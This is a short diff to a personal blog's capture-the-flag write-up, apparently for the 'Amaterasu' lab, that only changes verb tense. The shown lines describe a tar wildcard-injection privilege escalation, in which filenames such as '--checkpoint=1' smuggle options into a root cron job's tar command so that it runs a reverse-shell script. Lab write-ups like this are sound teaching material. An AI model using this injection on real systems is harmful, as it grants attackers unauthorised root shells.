kei5uke/kei5uke.github.io/content/posts/amaterasu/index.md

 [alfredo@fedora restapi]$ echo "" > "--checkpoint=1"
 ```

-And run the commands above.
+Ran the commands above.
 These commands are registered as `tar czf /tmp/flask.tar.gz --checkpoint-action=exec=sh rev.sh --checkpoint=1` when cronjob is executed.

 # Root shell

 ![Screenshot 2024-01-01 at 21.01.02.png](Amaterasu%208a737b17570c4996b62a570a406df97f/Screenshot_2024-01-01_at_21.01.02.png)

-Wait for 1 minute, and got root shell.
+Waited for 1 minute, and got root shell.